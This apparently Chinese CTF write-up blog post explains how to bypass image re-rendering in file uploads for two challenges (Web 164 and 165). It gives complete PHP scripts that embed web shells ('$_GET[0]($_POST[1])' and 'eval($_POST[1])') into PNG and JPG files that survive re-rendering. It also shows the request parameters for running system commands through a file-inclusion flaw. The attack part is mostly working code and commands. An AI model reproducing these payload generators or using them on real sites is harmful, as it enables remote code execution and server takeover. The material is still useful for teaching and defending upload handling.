1. 二次渲染簡介
二次渲染指的是上傳的檔案(如圖片),為了顯示的更加規範(尺寸、畫素),網站會對檔案進行二次處理,經過解碼或轉換可能導致其中的惡意程式碼失效。例如,後門程式在影像渲染過程中可能被清除或無法執行。
2. 二次渲染存在性判斷
2.1 檔案大小變化
訪問上傳的檔案地址,重新下載下來,檢視檔案大小是否發生改變
2.2 圖片資料包
將上傳圖片的傳送包和訪問檔案地址的返回包發到burpsuite的compare模組,檢視是否存在差異
3. png繞過二次渲染——Web 164
3.1 題目分析
嘗試上傳一張正常的圖片,下載上傳後的檔案檢視,發現本題對圖片進行了二次渲染,寫入的php程式碼容易損壞。
隨意寫入一些內容,上傳失敗顯示檔案型別不合規。本題在在檔案上傳時進行了CRC(迴圈冗餘校驗)以確保檔案未被篡改。我們在PNG檔案中新增了文字,導致檔案結構被破壞,從而無法透過校驗。因此我們插入php程式碼後,必須重新計算相應的crc值並修改才能透過校驗
3.2 生成後門圖片
因此推薦使用以下指令碼直接直接對圖片插入後門程式碼:
<?php
$p = array(0xa3, 0x9f, 0x67, 0xf7, 0x0e, 0x93, 0x1b, 0x23,
0xbe, 0x2c, 0x8a, 0xd0, 0x80, 0xf9, 0xe1, 0xae,
0x22, 0xf6, 0xd9, 0x43, 0x5d, 0xfb, 0xae, 0xcc,
0x5a, 0x01, 0xdc, 0x5a, 0x01, 0xdc, 0xa3, 0x9f,
0x67, 0xa5, 0xbe, 0x5f, 0x76, 0x74, 0x5a, 0x4c,
0xa1, 0x3f, 0x7a, 0xbf, 0x30, 0x6b, 0x88, 0x2d,
0x60, 0x65, 0x7d, 0x52, 0x9d, 0xad, 0x88, 0xa1,
0x66, 0x44, 0x50, 0x33);
$img = imagecreatetruecolor(32, 32);
for ($y = 0; $y < sizeof($p); $y += 3) {
$r = $p[$y];
$g = $p[$y+1];
$b = $p[$y+2];
$color = imagecolorallocate($img, $r, $g, $b);
imagesetpixel($img, round($y / 3), 0, $color);
}
imagepng($img,'1.png'); //要修改的圖片的路徑
/* 木馬內容
<?$_GET[0]($_POST[1]);?>
*/
//imagepng($img,'1.png'); 要修改的圖片的路徑,1.png是使用的檔案,可以不存在
//會在目錄下自動建立一個1.png圖片
//圖片指令碼內容:$_GET[0]($_POST[1]);
//使用方法:例子:檢視圖片,get傳入0=system;post傳入tac flag.php
?>
使用方法:
配置php環境變數,在該指令碼資料夾下執行以下cmd命令
php 指令碼名.php 要修改的圖片名.png
然後就會在當前資料夾生成一個1.png,包含的木馬內容如下
<?$_GET[0]($_POST[1]);?>
3.3 後門程式碼利用
訪問圖片地址,利用如下的惡意程式碼將想要的內容輸出到1.txt
https://xxx/download.php?image=xxxxx&0=system
post:
1=ls > 1.txt
1=tac flag.php >1.txt
訪問https://xxx/1.txt,得到以下內容
3.4 為什麼圖片解析php
在本題中,我透過向圖片傳php惡意程式碼,竟然成功執行了,這是為什麼呢?
我們tac一下download.php來看一下
} echo "图片错误";
}else{
include("./upload/".strrev($file));
header('Content-Type:image/png');
if($ext==='.png' && file_exists("./upload/".strrev($file))){
$ext = strrev(substr($file, 0,4));
$file = strrev($file);
$file= $_GET['image'];
程式碼的邏輯總結:
- 從 URL 獲取檔名:透過
$_GET['image']
獲取傳遞的檔名。 - 處理檔名:透過
strrev()
反轉檔名來獲取實際的檔案,並透過substr()
獲取檔案的副檔名。 - 檢查檔案是否存在且為 PNG 格式:判斷副檔名是否為
.png
,以及檔案是否存在於./upload/
目錄。 - 輸出圖片檔案:如果條件滿足,包含並輸出這個檔案,並將響應頭設為
image/png
以顯示 PNG 圖片。
這下明白了,本題檢視圖片的功能是透過檔案包含的形式實現的,傳入圖片的程式碼被包含到了download.php,從而成功被執行
4. jpg繞過二次渲染——Web 165
4.1 生成後門圖片
利用以下指令碼生成,需要注意的是:是先上傳原圖,把二次渲染後的圖片進行指令碼加工
<?php
/*
將有效載荷注入JPG影像的演算法,該演算法在PHP函式imagecopyresized()和imagecopyresampled()引起的變換後保持不變。
初始影像的大小和質量必須與處理後的影像的大小和質量相同。
1)透過安全檔案上傳指令碼上傳任意影像
2)儲存處理後的影像並啟動:
php 檔名.php <檔名.jpg >
如果注射成功,您將獲得一個特製的影像,該影像應再次上傳。
由於使用了最直接的注射方法,可能會出現以下問題:
1)在第二次處理之後,注入的資料可能變得部分損壞。
jpg _ payload.php指令碼輸出“有問題”。
如果發生這種情況,請嘗試更改有效載荷(例如,在開頭新增一些符號)或嘗試另一個初始影像。
謝爾蓋·博布羅夫@Black2Fan。
另請參見:
https://www . idontplaydarts . com/2012/06/encoding-we B- shell-in-png-idat-chunks/
*/
$miniPayload = '<?=eval($_POST[1]);?>';
if(!extension_loaded('gd') || !function_exists('imagecreatefromjpeg')) {
die('php-gd is not installed');
}
if(!isset($argv[1])) {
die('php jpg_payload.php <jpg_name.jpg>');
}
set_error_handler("custom_error_handler");
for($pad = 0; $pad < 1024; $pad++) {
$nullbytePayloadSize = $pad;
$dis = new DataInputStream($argv[1]);
$outStream = file_get_contents($argv[1]);
$extraBytes = 0;
$correctImage = TRUE;
if($dis->readShort() != 0xFFD8) {
die('Incorrect SOI marker');
}
while((!$dis->eof()) && ($dis->readByte() == 0xFF)) {
$marker = $dis->readByte();
$size = $dis->readShort() - 2;
$dis->skip($size);
if($marker === 0xDA) {
$startPos = $dis->seek();
$outStreamTmp =
substr($outStream, 0, $startPos) .
$miniPayload .
str_repeat("\0",$nullbytePayloadSize) .
substr($outStream, $startPos);
checkImage('_'.$argv[1], $outStreamTmp, TRUE);
if($extraBytes !== 0) {
while((!$dis->eof())) {
if($dis->readByte() === 0xFF) {
if($dis->readByte !== 0x00) {
break;
}
}
}
$stopPos = $dis->seek() - 2;
$imageStreamSize = $stopPos - $startPos;
$outStream =
substr($outStream, 0, $startPos) .
$miniPayload .
substr(
str_repeat("\0",$nullbytePayloadSize).
substr($outStream, $startPos, $imageStreamSize),
0,
$nullbytePayloadSize+$imageStreamSize-$extraBytes) .
substr($outStream, $stopPos);
} elseif($correctImage) {
$outStream = $outStreamTmp;
} else {
break;
}
if(checkImage('payload_'.$argv[1], $outStream)) {
die('Success!');
} else {
break;
}
}
}
}
unlink('payload_'.$argv[1]);
die('Something\'s wrong');
function checkImage($filename, $data, $unlink = FALSE) {
global $correctImage;
file_put_contents($filename, $data);
$correctImage = TRUE;
imagecreatefromjpeg($filename);
if($unlink)
unlink($filename);
return $correctImage;
}
function custom_error_handler($errno, $errstr, $errfile, $errline) {
global $extraBytes, $correctImage;
$correctImage = FALSE;
if(preg_match('/(\d+) extraneous bytes before marker/', $errstr, $m)) {
if(isset($m[1])) {
$extraBytes = (int)$m[1];
}
}
}
class DataInputStream {
private $binData;
private $order;
private $size;
public function __construct($filename, $order = false, $fromString = false) {
$this->binData = '';
$this->order = $order;
if(!$fromString) {
if(!file_exists($filename) || !is_file($filename))
die('File not exists ['.$filename.']');
$this->binData = file_get_contents($filename);
} else {
$this->binData = $filename;
}
$this->size = strlen($this->binData);
}
public function seek() {
return ($this->size - strlen($this->binData));
}
public function skip($skip) {
$this->binData = substr($this->binData, $skip);
}
public function readByte() {
if($this->eof()) {
die('End Of File');
}
$byte = substr($this->binData, 0, 1);
$this->binData = substr($this->binData, 1);
return ord($byte);
}
public function readShort() {
if(strlen($this->binData) < 2) {
die('End Of File');
}
$short = substr($this->binData, 0, 2);
$this->binData = substr($this->binData, 2);
if($this->order) {
$short = (ord($short[1]) << 8) + ord($short[0]);
} else {
$short = (ord($short[0]) << 8) + ord($short[1]);
}
return $short;
}
public function eof() {
return !$this->binData||(strlen($this->binData) === 0);
}
}
?>
後門程式碼為
<?=eval($_POST[1]);?>
4.2 後門程式碼利用
https://xxx/download.php?image=xxxxx
post:
1=system("ls > 1.txt");
1=system("tac flag.php > 1.txt");
訪問https://xxx/1.txt
5. 宇宙安全宣告
本部落格所提供的內容僅供學習與交流,旨在提高網路安全技術水平,謹遵守國家相關法律法規,請勿用於違法用途,博主不對任何人因使用部落格中提到的技術或工具而產生的任何後果負責。如果您對文章內容有疑問,可以留言私信。